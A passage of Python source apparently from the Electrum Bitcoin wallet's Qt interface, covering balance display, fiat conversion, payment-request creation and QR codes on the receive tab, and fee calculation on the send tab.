    if self.require_fee_update:
        self.do_update_fee()
        self.require_fee_update = False
    self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
    """Format satoshi amount *x* using the user's decimal-point and zero-padding settings."""
    return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
    """Render *amount* in the user's base unit, with a fiat equivalent when a rate is known."""
    text = self.format_amount(amount) + ' '+ self.base_unit()
    fiat = self.fx.format_amount_and_units(amount) if self.fx else None
    if text and fiat:
        text += ' (%s)'%fiat
    return text
def format_fee_rate(self, fee_rate):
    """Render a fee rate as 'N sat/byte'."""
    # fee_rate is in sat/kB
    return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
    # Decimal places of the current base unit (e.g. 8 for BTC).
    return self.decimal_point
def base_unit(self):
    """Return the display name of the current base unit (derived from decimal_point)."""
    return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
    """Keep a BTC amount edit and its fiat twin in sync via the current FX rate.

    The 'follows' flag breaks the signal feedback loop: when one edit is
    updated programmatically from the other, its textChanged handler is a
    no-op instead of re-triggering the conversion.
    """
    def edit_changed(edit):
        if edit.follows:
            return  # this change was made by us, not by the user
        edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
        fiat_e.is_last_edited = (edit == fiat_e)
        amount = edit.get_amount()
        rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
        if rate.is_nan() or amount is None:
            # No usable rate or amount: blank the opposite field(s).
            if edit is fiat_e:
                btc_e.setText("")
                if fee_e:
                    fee_e.setText("")
            else:
                fiat_e.setText("")
        else:
            if edit is fiat_e:
                btc_e.follows = True
                btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                btc_e.follows = False
                if fee_e:
                    window.update_fee()
            else:
                fiat_e.follows = True
                fiat_e.setText(self.fx.ccy_amount_str(
                    amount * Decimal(rate) / COIN, False))
                fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                fiat_e.follows = False

    btc_e.follows = False
    fiat_e.follows = False
    fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
    btc_e.textChanged.connect(partial(edit_changed, btc_e))
    fiat_e.is_last_edited = False
def update_status(self):
    """Refresh the balance label, tray tooltip and status icon from wallet/network state."""
    if not self.wallet:
        return
    if self.network is None:
        text = _("Offline")
        icon = read_QIcon("status_disconnected.png")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        server_lag = self.network.get_local_height() - server_height
        # a fork suffix selects alternative icon artwork when >1 chain is known
        fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
        # Server height can be 0 after switching to a new server
        # until we get a headers subscription request response.
        # Display the synchronizing message in that case.
        if not self.wallet.up_to_date or server_height == 0:
            num_sent, num_answered = self.wallet.get_history_sync_state_details()
            text = ("{} ({}/{})"
                    .format(_("Synchronizing..."), num_answered, num_sent))
            icon = read_QIcon("status_waiting.png")
        elif server_lag > 1:
            # our server is more than one block behind the locally known tip
            text = _("Server is lagging ({} blocks)").format(server_lag)
            icon = read_QIcon("status_lagging%s.png"%fork_str)
        else:
            # c/u/x = confirmed, unconfirmed, unmatured balances
            c, u, x = self.wallet.get_balance()
            text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
            if u:
                text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
            if x:
                text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
            # append fiat balance and price
            if self.fx.is_enabled():
                text += self.fx.get_fiat_status_text(c + u + x,
                    self.base_unit(), self.get_decimal_point()) or ''
            if not self.network.proxy:
                icon = read_QIcon("status_connected%s.png"%fork_str)
            else:
                icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
    else:
        if self.network.proxy:
            text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
        else:
            text = _("Not connected")
        icon = read_QIcon("status_disconnected.png")
    self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
    self.balance_label.setText(text)
    self.status_button.setIcon( icon )
def update_wallet(self):
    """Refresh the status bar; refresh the tab views once synced (or when offline)."""
    self.update_status()
    fully_synced = self.wallet.up_to_date
    online = bool(self.network) and self.network.is_connected()
    if fully_synced or not online:
        self.update_tabs()
def update_tabs(self, wallet=None):
    """Refresh every list view; no-op when `wallet` is given and is not the active wallet."""
    target = self.wallet if wallet is None else wallet
    if target != self.wallet:
        return
    self.history_model.refresh('update_tabs')
    for view in (self.request_list, self.address_list, self.utxo_list,
                 self.contact_list, self.invoice_list):
        view.update()
    self.update_completions()
def create_history_tab(self):
    """Build the History tab: model, list view, and its (optionally hidden) toolbar."""
    self.history_model = HistoryModel(self)
    self.history_list = l = HistoryList(self, self.history_model)
    self.history_model.set_view(self.history_list)
    # the list doubles as its own searchable widget
    l.searchable_list = l
    toolbar = l.create_toolbar(self.config)
    # toolbar visibility is a persisted user preference
    toolbar_shown = self.config.get('show_toolbar_history', False)
    l.show_toolbar(toolbar_shown)
    return self.create_list_tab(l, toolbar)
def show_address(self, addr):
    """Open the address-details dialog for `addr`."""
    from . import address_dialog
    dlg = address_dialog.AddressDialog(self, addr)
    dlg.exec_()
def show_transaction(self, tx, tx_desc = None):
    """Open the transaction-details dialog.

    tx_desc is set only for txs created in the Send tab.
    """
    show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
    """Build the Receive tab: request form, clickable QR preview and saved-requests list."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.receive_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    self.receive_address_e = ButtonsLineEdit()
    self.receive_address_e.addCopyButton(self.app)
    self.receive_address_e.setReadOnly(True)
    msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
    self.receive_address_label = HelpLabel(_('Receiving address'), msg)
    # any edit to address/description/amount regenerates the QR code
    self.receive_address_e.textChanged.connect(self.update_receive_qr)
    self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
    grid.addWidget(self.receive_address_label, 0, 0)
    grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
    self.receive_message_e = QLineEdit()
    grid.addWidget(QLabel(_('Description')), 1, 0)
    grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
    self.receive_message_e.textChanged.connect(self.update_receive_qr)
    self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
    grid.addWidget(QLabel(_('Requested amount')), 2, 0)
    grid.addWidget(self.receive_amount_e, 2, 1)
    self.receive_amount_e.textChanged.connect(self.update_receive_qr)
    self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_receive_e.setVisible(False)
    grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
    # keep BTC and fiat amount fields in sync (no fee field on this tab)
    self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
    self.expires_combo = QComboBox()
    self.expires_combo.addItems([i[0] for i in expiration_values])
    self.expires_combo.setCurrentIndex(3)
    self.expires_combo.setFixedWidth(self.receive_amount_e.width())
    msg = ' '.join([
        _('Expiration date of your request.'),
        _('This information is seen by the recipient if you send them a signed payment request.'),
        _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
        _('The bitcoin address never expires and will always be part of this electrum wallet.'),
    ])
    grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
    grid.addWidget(self.expires_combo, 3, 1)
    # read-only label shown (in the same grid cell) instead of the combo
    # for already-saved requests
    self.expires_label = QLineEdit('')
    self.expires_label.setReadOnly(1)
    self.expires_label.setFocusPolicy(Qt.NoFocus)
    self.expires_label.hide()
    grid.addWidget(self.expires_label, 3, 1)
    self.save_request_button = QPushButton(_('Save'))
    self.save_request_button.clicked.connect(self.save_payment_request)
    self.new_request_button = QPushButton(_('New'))
    self.new_request_button.clicked.connect(self.new_payment_request)
    # clicking the QR preview opens the detached QR window
    self.receive_qr = QRCodeWidget(fixedSize=200)
    self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
    self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
    self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
    self.receive_buttons = buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.save_request_button)
    buttons.addWidget(self.new_request_button)
    grid.addLayout(buttons, 4, 1, 1, 2)
    self.receive_requests_label = QLabel(_('Requests'))
    from .request_list import RequestList
    self.request_list = RequestList(self)
    # layout
    vbox_g = QVBoxLayout()
    vbox_g.addLayout(grid)
    vbox_g.addStretch()
    hbox = QHBoxLayout()
    hbox.addLayout(vbox_g)
    hbox.addWidget(self.receive_qr)
    w = QWidget()
    w.searchable_list = self.request_list
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.receive_requests_label)
    vbox.addWidget(self.request_list)
    vbox.setStretchFactor(self.request_list, 1000)
    return w
def delete_payment_request(self, addr):
    """Remove the stored payment request for `addr` and reset the receive tab."""
    self.wallet.remove_payment_request(addr, self.config)
    self.request_list.update()
    self.clear_receive_tab()
def get_request_URI(self, addr):
    """Build a BIP21 payment URI for the stored payment request at `addr`."""
    req = self.wallet.receive_requests[addr]
    message = self.wallet.labels.get(addr, '')
    amount = req['amount']
    # optional fields are only added when present on the stored request
    extra_query_params = {}
    if req.get('time'):
        extra_query_params['time'] = str(int(req.get('time')))
    if req.get('exp'):
        extra_query_params['exp'] = str(int(req.get('exp')))
    # signed requests carry the signer name and a base58-encoded signature
    if req.get('name') and req.get('sig'):
        sig = bfh(req.get('sig'))
        sig = bitcoin.base_encode(sig, base=58)
        extra_query_params['name'] = req['name']
        extra_query_params['sig'] = sig
    uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
    return str(uri)
def sign_payment_request(self, addr):
    """Sign the payment request at `addr` with the configured alias key.

    Silently does nothing when no alias is configured, the alias has no
    address, or the alias address is not controlled by this wallet.
    """
    alias = self.config.get('alias')
    alias_privkey = None  # NOTE(review): assigned but never used in this method
    if alias and self.alias_info:
        alias_addr, alias_name, validated = self.alias_info
        if alias_addr:
            if self.wallet.is_mine(alias_addr):
                msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                password = None
                if self.wallet.has_keystore_encryption():
                    password = self.password_dialog(msg)
                    if not password:
                        # user cancelled the password prompt
                        return
                try:
                    self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                except Exception as e:
                    self.show_error(str(e))
                    return
            else:
                return
def save_payment_request(self):
    """Create a payment request from the receive-tab fields and store it in the wallet.

    Returns False (after showing an error) when neither a message nor an
    amount was entered.
    """
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    if not message and not amount:
        self.show_error(_('No message or amount'))
        return False
    # map the combo index to its expiration duration (seconds or None)
    i = self.expires_combo.currentIndex()
    expiration = list(map(lambda x: x[1], expiration_values))[i]
    req = self.wallet.make_payment_request(addr, amount, message, expiration)
    try:
        self.wallet.add_payment_request(req, self.config)
    except Exception as e:
        self.logger.exception('Error adding payment request')
        self.show_error(_('Error adding payment request') + ':\n' + str(e))
    else:
        # only sign and disable the Save button on success
        self.sign_payment_request(addr)
        self.save_request_button.setEnabled(False)
    finally:
        # refresh the views regardless of the outcome
        self.request_list.update()
        self.address_list.update()
def view_and_paste(self, title, msg, data):
    """Modal dialog presenting `data` as QR/text with a copy-to-clipboard button."""
    dialog = WindowModalDialog(self, title)
    vbox = QVBoxLayout()
    label = QLabel(msg)
    label.setWordWrap(True)
    vbox.addWidget(label)
    pr_e = ShowQRTextEdit(text=data)
    vbox.addWidget(pr_e)
    # single button copies the text and closes the dialog
    vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
    dialog.setLayout(vbox)
    dialog.exec_()
def export_payment_request(self, addr):
    """Serialize the payment request at `addr` as BIP70 and save it to a user-chosen file."""
    r = self.wallet.receive_requests.get(addr)
    pr = paymentrequest.serialize_request(r).SerializeToString()
    name = r['id'] + '.bip70'
    fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
    if fileName:
        # binary protobuf payload, hence "wb+"
        with open(fileName, "wb+") as f:
            f.write(util.to_bytes(pr))
        self.show_message(_("Request saved successfully"))
        self.saved = True
def new_payment_request(self):
    """Prepare the receive tab with a fresh unused address for a new request."""
    addr = self.wallet.get_unused_address()
    if addr is None:
        # no unused address left: either we cannot create one at all, or
        # we must warn before exceeding the gap limit
        if not self.wallet.is_deterministic():
            msg = [
                _('No more addresses in your wallet.'),
                _('You are using a non-deterministic wallet, which cannot create new addresses.'),
                _('If you want to create new addresses, use a deterministic wallet instead.')
            ]
            self.show_message(' '.join(msg))
            return
        if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
            return
        addr = self.wallet.create_new_address(False)
    self.set_receive_address(addr)
    self.expires_label.hide()
    self.expires_combo.show()
    self.new_request_button.setEnabled(False)
    self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
    """Populate the receive form with `addr`, clearing description and amount."""
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
    """Reset the receive tab back to the wallet's current receiving address."""
    try:
        addr = self.wallet.get_receiving_address() or ''
    except InternalAddressCorruption as e:
        # wallet reported corrupted address derivation: warn, show no address
        self.show_error(str(e))
        addr = ''
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
    self.expires_label.hide()
    self.expires_combo.show()
def toggle_qr_window(self):
    """Show/hide the detached QR window, preserving its geometry across toggles."""
    from . import qrwindow
    if not self.qr_window:
        # first use: create the window and remember where it opened
        self.qr_window = qrwindow.QR_Window(self)
        self.qr_window.setVisible(True)
        self.qr_window_geometry = self.qr_window.geometry()
    else:
        if not self.qr_window.isVisible():
            # restore at the last remembered position
            self.qr_window.setVisible(True)
            self.qr_window.setGeometry(self.qr_window_geometry)
        else:
            # remember the position before hiding
            self.qr_window_geometry = self.qr_window.geometry()
            self.qr_window.setVisible(False)
    self.update_receive_qr()
def show_send_tab(self):
    """Bring the Send tab to the front."""
    send_index = self.tabs.indexOf(self.send_tab)
    self.tabs.setCurrentIndex(send_index)
def show_receive_tab(self):
    """Bring the Receive tab to the front."""
    receive_index = self.tabs.indexOf(self.receive_tab)
    self.tabs.setCurrentIndex(receive_index)
def receive_at(self, addr):
    """Switch to the receive tab pre-filled with `addr`; ignores invalid addresses."""
    if not bitcoin.is_address(addr):
        return
    self.show_receive_tab()
    self.receive_address_e.setText(addr)
    self.new_request_button.setEnabled(True)
def update_receive_qr(self):
    """Regenerate the receive QR code (and the detached QR window) from the form fields."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    # a request is only savable once it has an amount or a description
    self.save_request_button.setEnabled((amount is not None) or (message != ""))
    uri = util.create_bip21_uri(addr, amount, message)
    self.receive_qr.setData(uri)
    # mirror into the detached QR window when it is open
    if self.qr_window and self.qr_window.isVisible():
        self.qr_window.qrw.setData(uri)
def set_feerounding_text(self, num_satoshis_added):
    """Remember the tooltip/message text explaining the current fee-rounding delta."""
    self.feerounding_text = _('Additional {} satoshis are going to be added.').format(
        num_satoshis_added)
def create_send_tab(self):
    """Build the Send tab: pay-to form, fee controls and the invoice list."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from .paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.payto_e = PayToEdit(self)
    msg = _('Recipient of the funds.') + '\n\n'\
          + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    # auto-completion of recipients from the contact list
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.set_completer(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
          + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = MyLineEdit()
    grid.addWidget(self.message_e, 2, 1, 1, -1)
    # "From" row lists manually selected coins; hidden when empty
    self.from_label = QLabel(_('From'))
    grid.addWidget(self.from_label, 3, 0)
    self.from_list = FromList(self, self.from_list_menu)
    grid.addWidget(self.from_list, 3, 1, 1, -1)
    self.set_pay_from([])
    msg = _('Amount to be sent.') + '\n\n' \
          + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
          + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
          + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 4, 0)
    grid.addWidget(self.amount_e, 4, 1)
    self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_send_e.setVisible(False)
    grid.addWidget(self.fiat_send_e, 4, 2)
    # freeze the fiat field together with the BTC field
    self.amount_e.frozen.connect(
        lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
    self.max_button = EnterButton(_("Max"), self.spend_max)
    self.max_button.setFixedWidth(140)
    self.max_button.setCheckable(True)
    grid.addWidget(self.max_button, 4, 3)
    hbox = QHBoxLayout()
    hbox.addStretch(1)
    grid.addLayout(hbox, 4, 4)
    msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
          + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
          + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
    self.fee_e_label = HelpLabel(_('Fee'), msg)
    def fee_cb(dyn, pos, fee_rate):
        # slider callback: persist the chosen level and refresh the fee fields
        if dyn:
            if self.config.use_mempool_fees():
                self.config.set_key('depth_level', pos, False)
            else:
                self.config.set_key('fee_level', pos, False)
        else:
            self.config.set_key('fee_per_kb', fee_rate, False)
        if fee_rate:
            fee_rate = Decimal(fee_rate)
            self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
        else:
            self.feerate_e.setAmount(None)
        self.fee_e.setModified(False)
        self.fee_slider.activate()
        self.spend_max() if self.max_button.isChecked() else self.update_fee()
    self.fee_slider = FeeSlider(self, self.config, fee_cb)
    self.fee_slider.setFixedWidth(140)
    def on_fee_or_feerate(edit_changed, editing_finished):
        # only one of fee/feerate may be "modified" (frozen) at a time
        edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
        if editing_finished:
            if edit_changed.get_amount() is None:
                # This is so that when the user blanks the fee and moves on,
                # we go back to auto-calculate mode and put a fee back.
                edit_changed.setModified(False)
        else:
            # edit_changed was edited just now, so make sure we will
            # freeze the correct fee setting (this)
            edit_other.setModified(False)
        self.fee_slider.deactivate()
        self.update_fee()
    class TxSizeLabel(QLabel):
        # read-only label showing the estimated tx size between the fee fields
        def setAmount(self, byte_size):
            self.setText(('x %s bytes =' % byte_size) if byte_size else '')
    self.size_e = TxSizeLabel()
    self.size_e.setAlignment(Qt.AlignCenter)
    self.size_e.setAmount(0)
    self.size_e.setFixedWidth(140)
    self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
    self.feerate_e = FeerateEdit(lambda: 0)
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
    self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
    self.fee_e = BTCAmountEdit(self.get_decimal_point)
    self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
    self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
    def feerounding_onclick():
        text = (self.feerounding_text + '\n\n' +
                _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
                _('At most 100 satoshis might be lost due to this rounding.') + ' ' +
                _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
                _('Also, dust is not kept as change, but added to the fee.') + '\n' +
                _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
        self.show_message(title=_('Fee rounding'), msg=text)
    # small info icon shown only when the actual fee differs from the displayed one
    self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
    self.feerounding_icon.setFixedWidth(20)
    self.feerounding_icon.setFlat(True)
    self.feerounding_icon.clicked.connect(feerounding_onclick)
    self.feerounding_icon.setVisible(False)
    self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
    vbox_feelabel = QVBoxLayout()
    vbox_feelabel.addWidget(self.fee_e_label)
    vbox_feelabel.addStretch(1)
    grid.addLayout(vbox_feelabel, 5, 0)
    self.fee_adv_controls = QWidget()
    hbox = QHBoxLayout(self.fee_adv_controls)
    hbox.setContentsMargins(0, 0, 0, 0)
    hbox.addWidget(self.feerate_e)
    hbox.addWidget(self.size_e)
    hbox.addWidget(self.fee_e)
    hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
    hbox.addStretch(1)
    vbox_feecontrol = QVBoxLayout()
    vbox_feecontrol.addWidget(self.fee_adv_controls)
    vbox_feecontrol.addWidget(self.fee_slider)
    grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
    # advanced fee controls hidden unless the user opted in
    if not self.config.get('show_fee', False):
        self.fee_adv_controls.setVisible(False)
    self.preview_button = EnterButton(_("Preview"), self.do_preview)
    self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
    self.send_button = EnterButton(_("Send"), self.do_send)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_button)
    buttons.addWidget(self.preview_button)
    buttons.addWidget(self.send_button)
    grid.addLayout(buttons, 6, 1, 1, 3)
    self.amount_e.shortcut.connect(self.spend_max)
    self.payto_e.textChanged.connect(self.update_fee)
    self.amount_e.textEdited.connect(self.update_fee)
    def reset_max(text):
        # typing any amount cancels "Max" mode
        self.max_button.setChecked(False)
        enable = not bool(text) and not self.amount_e.isReadOnly()
        self.max_button.setEnabled(enable)
    self.amount_e.textEdited.connect(reset_max)
    self.fiat_send_e.textEdited.connect(reset_max)
    def entry_changed():
        # recolor the amount/fee fields to reflect funds and auto-fill state
        text = ""
        amt_color = ColorScheme.DEFAULT
        fee_color = ColorScheme.DEFAULT
        feerate_color = ColorScheme.DEFAULT
        if self.not_enough_funds:
            amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
            feerate_color = ColorScheme.RED
            text = _("Not enough funds")
            c, u, x = self.wallet.get_frozen_balance()
            if c+u+x:
                text += " ({} {} {})".format(
                    self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
                )
        # blue color denotes auto-filled values
        elif self.fee_e.isModified():
            feerate_color = ColorScheme.BLUE
        elif self.feerate_e.isModified():
            fee_color = ColorScheme.BLUE
        elif self.amount_e.isModified():
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        else:
            amt_color = ColorScheme.BLUE
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        self.statusBar().showMessage(text)
        self.amount_e.setStyleSheet(amt_color.as_stylesheet())
        self.fee_e.setStyleSheet(fee_color.as_stylesheet())
        self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
    self.amount_e.textChanged.connect(entry_changed)
    self.fee_e.textChanged.connect(entry_changed)
    self.feerate_e.textChanged.connect(entry_changed)
    self.invoices_label = QLabel(_('Invoices'))
    from .invoice_list import InvoiceList
    self.invoice_list = InvoiceList(self)
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoice_list)
    vbox.setStretchFactor(self.invoice_list, 1000)
    w.searchable_list = self.invoice_list
    # let plugins extend the grid
    run_hook('create_send_tab', grid)
    return w
def spend_max(self):
    """Check the Max button and recompute the fee, unless a plugin aborts the send."""
    if run_hook('abort_send', self):
        return
    self.max_button.setChecked(True)
    self.do_update_fee()
def update_fee(self):
    """Flag the fee as stale; timer_actions() performs the actual recomputation."""
    self.require_fee_update = True
def get_payto_or_dummy(self):
    """Return the entered recipient, or a dummy wallet address for fee estimation."""
    recipient = self.payto_e.get_recipient()
    if recipient:
        return recipient
    return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
    '''Recalculate the fee. If the fee was manually input, retain it, but
    still build the TX to see if there are enough funds.
    '''
    # "frozen" means the user pinned the value manually in that field
    freeze_fee = self.is_send_fee_frozen()
    freeze_feerate = self.is_send_feerate_frozen()
    # '!' is the sentinel for "spend max"
    amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
    if amount is None:
        if not freeze_fee:
            self.fee_e.setAmount(None)
        self.not_enough_funds = False
        self.statusBar().showMessage('')
        return
    outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
    if not outputs:
        # no recipient yet: estimate against a dummy output
        _type, addr = self.get_payto_or_dummy()
        outputs = [TxOutput(_type, addr, amount)]
    is_sweep = bool(self.tx_external_keypairs)
    make_tx = lambda fee_est: \
        self.wallet.make_unsigned_transaction(
            coins, outputs, self.config,
            fixed_fee=fee_est, is_sweep=is_sweep)
    try:
        tx = make_tx(fee_estimator)
        self.not_enough_funds = False
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        if not freeze_fee:
            self.fee_e.setAmount(None)
        if not freeze_feerate:
            self.feerate_e.setAmount(None)
        self.feerounding_icon.setVisible(False)
        if isinstance(e, NotEnoughFunds):
            self.not_enough_funds = True
        elif isinstance(e, NoDynamicFeeEstimates):
            # still try to show the tx size with a zero fee
            try:
                tx = make_tx(0)
                size = tx.estimated_size()
                self.size_e.setAmount(size)
            except BaseException:
                pass
        return
    except BaseException:
        self.logger.exception('')
        return
    size = tx.estimated_size()
    self.size_e.setAmount(size)
    fee = tx.get_fee()
    fee = None if self.not_enough_funds else fee
    # Displayed fee/fee_rate values are set according to user input.
    # Due to rounding or dropping dust in CoinChooser,
    # actual fees often differ somewhat.
    if freeze_feerate or self.fee_slider.is_active():
        displayed_feerate = self.feerate_e.get_amount()
        if displayed_feerate is not None:
            displayed_feerate = quantize_feerate(displayed_feerate)
        else:
            # fallback to actual fee
            displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
            self.feerate_e.setAmount(displayed_feerate)
        displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
        self.fee_e.setAmount(displayed_fee)
    else:
        if freeze_fee:
            displayed_fee = self.fee_e.get_amount()
        else:
            # fallback to actual fee if nothing is frozen
            displayed_fee = fee
            self.fee_e.setAmount(displayed_fee)
        displayed_fee = displayed_fee if displayed_fee else 0
        displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
        self.feerate_e.setAmount(displayed_feerate)
    # show/hide fee rounding icon
    feerounding = (fee - displayed_fee) if fee else 0
    self.set_feerounding_text(int(feerounding))
    self.feerounding_icon.setToolTip(self.feerounding_text)
    self.feerounding_icon.setVisible(abs(feerounding) >= 1)
    if self.max_button.isChecked():
        # in Max mode the amount is derived from the tx, minus plugin fees
        amount = tx.output_value()
        __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
        amount_after_all_fees = amount - x_fee_amount
        self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
    """Drop `item` from the manually selected coin list, then redraw and refresh the fee."""
    index = self.from_list.indexOfTopLevelItem(item)
    self.pay_from.pop(index)
    self.redraw_from_list()
    self.update_fee()
def from_list_menu(self, position):
    """Context menu for the "From" coin list offering removal of the clicked entry."""
    item = self.from_list.itemAt(position)
    menu = QMenu()
    menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
    menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
    """Replace the manual coin selection with `coins` and redraw the list."""
    self.pay_from = list(coins)
    self.redraw_from_list()
def redraw_from_list(self):
    """Rebuild the "From" coin list; the row is hidden entirely when no coins are selected."""
    self.from_list.clear()
    self.from_label.setHidden(len(self.pay_from) == 0)
    self.from_list.setHidden(len(self.pay_from) == 0)
    def format(x):
        # abbreviated outpoint "txid[:10]...txid[-10:]:n" followed by the address
        h = x.get('prevout_hash')
        return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
    for item in self.pay_from:
        self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
    """Return the pay-to completion string: 'label <address>' for address contacts."""
    kind, label = self.contacts.get(key)
    if kind == 'address':
        return '{} <{}>'.format(label, key)
    return key
def update_completions(self):
    """Refresh the pay-to auto-completion model from the contact list."""
